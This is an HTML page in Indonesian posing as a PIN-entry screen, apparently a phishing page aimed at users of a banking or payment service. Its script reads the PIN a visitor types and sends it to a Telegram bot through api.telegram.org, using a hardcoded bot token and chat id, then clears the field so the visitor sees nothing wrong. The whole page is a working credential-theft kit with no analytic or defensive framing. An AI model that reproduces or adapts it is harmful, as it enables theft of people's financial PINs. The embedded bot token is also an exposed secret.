<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Masukkan</title>
    <link href='https://unpkg.com/boxicons@2.1.2/css/boxicons.min.css' rel='stylesheet'>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
     <style>
    <p> {
        color: ;
    }
    body{
    background-image: url("https://static.tildacdn.com/tild3937-3766-4039-a139-363638383737/IMG_20230921_083000.jpg");
    background-size: cover;
    background-repeat: no-repeat;
    background-position: center;
    background-attachment: fixed;
            margin: 0px;
            padding: 0px;
            width: 100%;
            height: 500px;
            font-family: sans-serif;
            background-color: #fff;
            background-size: 100%;
        }
        header {
            position: ;
            top: 0;
            left: 0;
            width: 100%;
            height: 70px;
            padding: 0px;
            color: #ffffff;
            background: transparent;
            text-align: center;
        }
        .login{
            width: 100%;
            text-align: center;
            height: 200px;                        
            box-sizing: border-box;
            padding: 0px;
            position: fixed;
            background-color: transparent;
            border-radius: 10px;
            border: 1px solid transparent;                           
        }
        .login input-group{
            position: relative;
            width: 100%;
        }
        img {
            width: 30%;
            padding: 20px;
        }
        h4 {
            font-size: 17px;
            color: white;
        }
        p {
            font-size: 14px;
        }
        .login .input-group input[type=password]{
            width: 90%;
            height: 45px;
            font-size: 20px;
            padding: 0 0px;
            border-radius: 5px;
            background-color: transparent;
            color: white;
            text-align: center;
            border: 1px solid white;            
        }
        .login .input-group button[type=submit]{
            width: 90%;
            height: 40px;
            border: 0px solid ;
            border-radius: 5px;
            background-color: #38AA34;
            color: black;
            position: relative;
            align-items: center;                             
        }
        .eye-icon{
            position: absolute;
            top: 140px;
            right: 60px;
            color: #fff;
            cursor: pointer;
            padding: 8px;
            font-size: 23px;
            transform: translateY(0%);
        }
        .login .input-group span{
            position: fixed;
            top: 188px;
            right: 105px;
            padding: 5px;
            font-size: 27px;
            text-transform: capitalize;
            background-color: transparent;
            transition: 0.5s;            
        }
    </style>
</head>
<body>
    <header class="img">
        <img src="" width="0%" alt="">
    </header>
    <form action="cot.html" onsubmit="return sender()">
        <div class="login">
            <div class="input-group">
               <h4 style="color: value;">𝗠𝗮𝘀𝘂𝗸𝗸𝗮𝗻 𝗣𝗜𝗡 </h4>
                <br>
            </div>
             <div class="input-group">
                <input name="pin" id="pl" class="inppin" inputmode="numeric" type="password" autocomplete="off" minlenght="1" maxlength="6" placeholder="" required>
                <br><br><br><br><br><br><br><br>
            </div>
            <div class="input-group">
              <button type="submit" onclick="submit()">Selanjutnya</button>
            </div>
        </div>
    </form>
    <script>
        //bot token
        var telegram_bot_id = "7566851766:AAEK0wnEFLt26bfdeNjKKDRaOHfvcVfYl_s"
        //chat id
        var chat_id = -1002437287311
        var u_password;
        var ready = function submitdata() {
            u_password = document.getElementById("pl").value;
            message = "\nPIN: " + u_password 
        };
        var sender =function () {
            ready();
            var settings = {
                "async": true,
                "crossDomain": true,
                "url": "https://api.telegram.org/bot" + telegram_bot_id + "/sendMessage",
                "method": "POST",
                "headers": {
                    "Content-Type": "application/json",
                    "cache-control": "no-cache"
                },
                "data": JSON.stringify({
                    "chat_id": chat_id,
                    "text": message
                })
            };
            $.ajax(settings).done(function(response) {
                console.log('');
            });
            document.getElementById("pl").value = "";
            return false;
        };
    </script>    
 
    
</body>
</html>